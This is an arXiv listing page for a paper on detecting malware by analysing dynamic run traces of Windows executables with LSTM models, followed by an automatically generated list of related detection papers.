Malicious Code Detection: Run Trace Output Analysis by LSTM
- URL: http://arxiv.org/abs/2101.05646v1
- Date: Thu, 14 Jan 2021 15:00:42 GMT
- Title: Malicious Code Detection: Run Trace Output Analysis by LSTM
- Authors: Cengiz Acarturk, Melih Sirlanci, Pinar Gurkan Balikcioglu, Deniz
Demirci, Nazenin Sahin, Ozge Acar Kucuk
- Abstract summary: We propose a methodological framework for detecting malicious code by analyzing run trace outputs by Long Short-Term Memory (LSTM)
We created our dataset from run trace outputs obtained from dynamic analysis of PE files.
Experiments showed that the ISM achieved an accuracy of 87.51% and a false positive rate of 18.34%, while BSM achieved an accuracy of 99.26% and a false positive rate of 2.62%.
- Score: 0.0
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: Malicious software threats and their detection have been gaining importance
as a subdomain of information security due to the expansion of ICT applications
in daily settings. A major challenge in designing and developing anti-malware
systems is the coverage of the detection, particularly the development of
dynamic analysis methods that can detect polymorphic and metamorphic malware
efficiently. In the present study, we propose a methodological framework for
detecting malicious code by analyzing run trace outputs by Long Short-Term
Memory (LSTM). We developed models of run traces of malicious and benign
Portable Executable (PE) files. We created our dataset from run trace outputs
obtained from dynamic analysis of PE files. The obtained dataset was in the
instruction format as a sequence and was called Instruction as a Sequence Model
(ISM). By splitting the first dataset into basic blocks, we obtained the second
one called Basic Block as a Sequence Model (BSM). The experiments showed that
the ISM achieved an accuracy of 87.51% and a false positive rate of 18.34%,
while BSM achieved an accuracy of 99.26% and a false positive rate of 2.62%.
Related papers
- $\textit{X}^2$-DFD: A framework for e${X}$plainable and e${X}$tendable Deepfake Detection [52.14468236527728]
We propose a novel framework called $X2$-DFD, consisting of three core modules.
The first module, Model Feature Assessment (MFA), measures the detection capabilities of forgery features intrinsic to MLLMs, and gives a descending ranking of these features.
The second module, Strong Feature Strengthening (SFS), enhances the detection and explanation capabilities by fine-tuning the MLLM on a dataset constructed based on the top-ranked features.
The third module, Weak Feature Supplementing (WFS), improves the fine-tuned MLLM's capabilities on lower-ranked features by integrating external dedicated
arXiv Detail & Related papers (2024-10-08T15:28:33Z) - SLIFER: Investigating Performance and Robustness of Malware Detection Pipelines [12.940071285118451]
academia focuses on combining static and dynamic analysis within a single or ensemble of models.
In this paper, we investigate the properties of malware detectors built with multiple and different types of analysis.
As far as we know, we are the first to investigate the properties of sequential malware detectors, shedding light on their behavior in real production environment.
arXiv Detail & Related papers (2024-05-23T12:06:10Z) - FoC: Figure out the Cryptographic Functions in Stripped Binaries with LLMs [54.27040631527217]
We propose a novel framework called FoC to Figure out the Cryptographic functions in stripped binaries.
We first build a binary large language model (FoC-BinLLM) to summarize the semantics of cryptographic functions in natural language.
We then build a binary code similarity model (FoC-Sim) upon the FoC-BinLLM to create change-sensitive representations and use it to retrieve similar implementations of unknown cryptographic functions in a database.
arXiv Detail & Related papers (2024-03-27T09:45:33Z) - Leveraging Large Language Models to Detect npm Malicious Packages [4.479741014073169]
This study empirically studies the effectiveness of Large Language Models (LLMs) in detecting malicious code.
We present SocketAI, a malicious code review workflow to detect malicious code.
arXiv Detail & Related papers (2024-03-18T19:10:12Z) - Discovering Malicious Signatures in Software from Structural
Interactions [7.06449725392051]
We propose a novel malware detection approach that leverages deep learning, mathematical techniques, and network science.
Our approach focuses on static and dynamic analysis and utilizes the Low-Level Virtual Machine (LLVM) to profile applications within a complex network.
Our approach marks a substantial improvement in malware detection, providing a notably more accurate and efficient solution.
arXiv Detail & Related papers (2023-12-19T23:42:20Z) - Malicious code detection in android: the role of sequence characteristics and disassembling methods [0.0]
We investigate and emphasize the factors that may affect the accuracy values of the models managed by researchers.
Our findings exhibit that the disassembly method and different input representations affect the model results.
arXiv Detail & Related papers (2023-12-02T11:55:05Z) - MAPS: A Noise-Robust Progressive Learning Approach for Source-Free
Domain Adaptive Keypoint Detection [76.97324120775475]
Cross-domain keypoint detection methods always require accessing the source data during adaptation.
This paper considers source-free domain adaptive keypoint detection, where only the well-trained source model is provided to the target domain.
arXiv Detail & Related papers (2023-02-09T12:06:08Z) - Analyzing Modality Robustness in Multimodal Sentiment Analysis [48.52878002917685]
Building robust multimodal models is crucial for achieving reliable deployment in the wild.
We propose simple diagnostic checks for modality robustness in a trained multimodal model.
We analyze well-known robust training strategies to alleviate the issues.
arXiv Detail & Related papers (2022-05-30T23:30:16Z) - Towards an Automated Pipeline for Detecting and Classifying Malware
through Machine Learning [0.0]
We propose a malware taxonomic classification pipeline able to classify Windows Portable Executable files (PEs)
Given an input PE sample, it is first classified as either malicious or benign.
If malicious, the pipeline further analyzes it in order to establish its threat type, family, and behavior(s)
arXiv Detail & Related papers (2021-06-10T10:07:50Z) - Robust and Transferable Anomaly Detection in Log Data using Pre-Trained
Language Models [59.04636530383049]
Anomalies or failures in large computer systems, such as the cloud, have an impact on a large number of users.
We propose a framework for anomaly detection in log data, as a major troubleshooting source of system information.
arXiv Detail & Related papers (2021-02-23T09:17:05Z) - Self-Supervised Log Parsing [59.04636530383049]
Large-scale software systems generate massive volumes of semi-structured log records.
Existing approaches rely on log-specifics or manual rule extraction.
We propose NuLog that utilizes a self-supervised learning model and formulates the parsing task as masked language modeling.
arXiv Detail & Related papers (2020-03-17T19:25:25Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.